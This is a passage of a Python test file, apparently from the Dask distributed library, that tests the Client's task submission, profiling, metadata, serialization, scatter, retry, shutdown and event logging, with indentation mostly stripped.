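# f(x + 1) + f(x + 2) via tasks submitted from inside the task. Starting from 0:
# f(4) = 8, f(3) = 12, f(2) = 20, f(1) = 32, so f(0) = f(1) + f(2) = 52.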
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def test_dynamic_workloads_sync(c):
future = c.submit(_dynamic_workload, 0, delay=0.02)
assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
future = c.submit(_dynamic_workload, 0, delay="random")
assert future.result(timeout=20) == 52
@pytest.mark.skipif(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = str
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = str
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
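# Client.profile(start=..., stop=...) aggregates worker profile samples within the
# given time window; a window entirely in the future should contain no samples.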
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
while future.status != "finished":
await asyncio.sleep(0.01)
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
func = _UnhashableCallable()
result = await c.submit(func, 1)
assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@gen_test()
async def test_dashboard_link_inproc():
async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
@gen_cluster(client=True, client_kwargs={"serializers": ["dask", "msgpack"]})
async def test_turn_off_pickle(c, s, a, b, direct):
np = pytest.importorskip("numpy")
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=":0") as c:
pass
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
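    # The relative ordering chosen by dask.order for the combined graph should
    # be reflected in the priorities the scheduler assigns to the two tasks.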
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
@pytest.mark.parametrize("workers_arg", [False, True])
@pytest.mark.parametrize("direct", [False, True])
@pytest.mark.parametrize("broadcast", [False, True, 10])
@gen_cluster(
client=True,
nthreads=[("", 1)] * 10,
worker_kwargs={"memory_monitor_interval": "20ms"},
)
async def test_scatter_and_replicate_avoid_paused_workers(
c, s, *workers, workers_arg, direct, broadcast
):
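    # Pause every worker except #3 and #7 by giving them an absurdly low memory
    # pause threshold; scatter/replicate should then place data only on the two
    # workers that remain unpaused.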
paused_workers = [w for i, w in enumerate(workers) if i not in (3, 7)]
for w in paused_workers:
w.memory_pause_fraction = 1e-15
while any(s.workers[w.address].status != Status.paused for w in paused_workers):
await asyncio.sleep(0.01)
f = await c.scatter(
{"x": 1},
workers=[w.address for w in workers[1:-1]] if workers_arg else None,
broadcast=broadcast,
direct=direct,
)
if not broadcast:
await c.replicate(f, n=10)
expect = [i in (3, 7) for i in range(10)]
actual = [("x" in w.data) for w in workers]
assert actual == expect
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
if threading.active_count() < 40:
return
active = dict(threading._active)
print(f"==== Found {len(active)} active threads: ====")
for t in active.values():
print(t)
assert False
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
before = proc.num_fds()
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address), Worker(s.address), Client(
s.address, asynchronous=True
):
assert proc.num_fds() > before
await df.sum().persist()
start = time()
while proc.num_fds() > before:
await asyncio.sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(
processes=False, asynchronous=True, dashboard_address=":0"
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(
n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
with dask.config.set(foo=100):
async with LocalCluster(
n_workers=1,
asynchronous=True,
processes=True,
dashboard_address=":0",
) as lc:
async with Client(lc, asynchronous=True) as c:
assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
@gen_test()
async def test_async_with():
async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
assert await c.submit(lambda x: x + 1, 10) == 11
assert c.status == "closed"
assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_on_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_on_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f(stacklevel, mode=None):
"""
We wrap this in a function so that the assertions aren't in the
        performance report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(
filename=fn, stacklevel=stacklevel, mode=mode
):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
    # Ensure default kwarg maintains backward compatibility
data = await f(stacklevel=1)
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert "No logs to report" in data
assert dask.__version__ in data
# stacklevel=2 captures code two frames back -- which in this case
# is the testing function
data = await f(stacklevel=2)
assert "async def test_performance_report(c, s, a, b):" in data
assert "Dask Performance Report" in data
# stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
# distributed internals
data = await f(stacklevel=0)
assert "Also, we want this comment to appear" in data
assert "Dask Performance Report" in data
data = await f(stacklevel=1, mode="inline")
assert "cdn.bokeh.org" not in data
data = await f(stacklevel=1, mode="cdn")
assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
):
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
):
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_register_worker_plugin_exception(c, s, a, b):
class MyPlugin:
def setup(self, worker=None):
raise ValueError("Setup failed")
with pytest.raises(ValueError, match="Setup failed"):
await c.register_worker_plugin(MyPlugin())
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
